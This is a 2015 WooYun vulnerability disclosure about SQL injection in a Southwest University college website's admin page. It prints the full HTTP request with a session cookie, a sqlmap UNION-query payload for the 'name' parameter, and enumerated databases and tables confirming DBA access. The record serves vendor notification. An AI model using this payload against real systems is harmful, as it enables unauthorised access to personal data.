当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156169

漏洞标题:西南大学某院SQL注入(DBA权限)

相关厂商:西南大学

漏洞作者: 路人甲

提交时间:2015-11-27 10:58

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT
多处存在注入,多处存在注入,多处存在注入,太多了,举一个。

详细说明:

http://hanhong.swu.edu.cn/  西南大学含弘学院


GET /admin/xuesheng_add.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20id%20in%20%3Cb%3E/opt/lampp/htdocs/admin/xuesheng.php%3C/b%3E%20on%20line%20%3Cb%3E109%3C/b%3E%3Cbr%20/%3E&name=-1&nianfen=2015 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://hanhong.swu.edu.cn
Cookie: PHPSESSID=qg09on74i0001f1l8tlvv64ai7
Host: hanhong.swu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


name参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=<br /><b>Notice</b>: Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />&name=-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x434f6671537576784f76565049554f62784a59666853777563714676696467546547447461744b74,0x7171627671),NULL-- -&nianfen=2015
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.1
current user: 'hanhong@localhost'
current database: 'hanhong'
current user is DBA: True
available databases [7]:
[*] cdcol
[*] hanhong
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test


根本就是没有防注入,类型有多种,为了快,就选了UNION query

Database: hanhong
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| common_member_count | 34117 |
| common_member_status | 34117 |
| common_member_log | 34109 |
| ucenter_memberfields | 31900 |
| common_credit_rule_log | 26457 |
| forum_statlog | 20352 |
| common_onlinetime | 19901 |
| common_district | 2677 |
| home_friendlog | 2616 |
| common_member_verify | 2293 |
| home_friend | 1671 |
| home_pokearchive | 1498 |
| home_clickuser | 1310 |
| common_stat | 865 |
| forum_post_tableid | 859 |
| common_credit_rule_log_field | 822 |
| home_poke | 806 |
| home_doing | 746 |
| common_member_field_forum | 556 |
| home_notification | 540 |
| home_docomment | 453 |
| home_picfield | 452 |
| register_student | 434 |
| forum_pollvoter | 393 |
| common_setting | 350 |
| home_pic | 334 |
| xsbmxx | 306 |
| forum_polloption | 272 |
| forum_spacecache | 272 |
| link | 247 |
| home_friend_request | 241 |
| ucenter_notelist | 232 |
| forum_debatepost | 206 |
| home_share | 205 |
| common_member_profile | 182 |
| common_stylevar | 180 |
| content | 179 |
| forum_thread | 137 |
| common_member | 127 |
| ucenter_members | 125 |
| forum_postcomment | 124 |
| home_class | 121 |
| home_comment | 113 |
| common_member_validate | 109 |
| common_block_style | 104 |
| common_syscache | 88 |
| common_smiley | 82 |
| forum_post | 76 |
| home_blog | 69 |
| common_block | 67 |
| common_template_block | 67 |
| ucenter_pms | 67 |
| common_admincp_perm | 63 |
| common_member_field_home | 63 |
| forum_poll | 63 |
| home_blogfield | 62 |
| forum_forumfield | 56 |
| forum_forum | 55 |
| forum_attachment | 52 |
| forum_attachmentfield | 51 |
| home_feed | 50 |
| common_member_profile_setting | 49 |
| common_nav | 36 |
| forum_memberrecommend | 34 |
| common_credit_rule | 29 |
| forum_modwork | 29 |
| home_album | 28 |
| common_credit_log | 26 |
| ucenter_settings | 25 |
| common_magic | 24 |
| home_visitor | 21 |
| common_usergroup | 19 |
| common_usergroup_field | 19 |
| list | 18 |
| forum_moderator | 17 |
| forum_activity | 15 |
| forum_activityapply | 15 |
| home_click | 15 |
| common_cron | 12 |
| forum_medal | 10 |
| home_favorite | 10 |
| forum_trade | 8 |
| admintea | 7 |
| common_admingroup | 7 |
| forum_postposition | 7 |
| forum_typeoption | 6 |
| ucenter_newpm | 6 |
| common_admincp_cmenu | 5 |
| common_admincp_group | 5 |
| forum_debate | 5 |
| common_regip | 4 |
| common_style | 4 |
| forum_bbcode | 4 |
| forum_onlinelist | 4 |
| forum_grouplevel | 3 |
| forum_imagetype | 3 |
| ucenter_admins | 3 |
| common_admincp_session | 2 |
| common_friendlink | 2 |
| common_magiclog | 2 |
| common_statuser | 2 |
| common_template | 2 |
| forum_tradelog | 2 |
| common_failedlogin | 1 |
| common_member_verify_info | 1 |
| common_secquestion | 1 |
| system | 1 |
| ucenter_applications | 1 |
| ucenter_failedlogins | 1 |
+-------------------------------+---------+


信息获取基本没难度...
DBA权限,你懂的,

漏洞证明:

修复方案:

最后提醒下,多处SQL

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-27 15:12

厂商回复:

已通知责任单位,谢谢!

最新状态:

暂无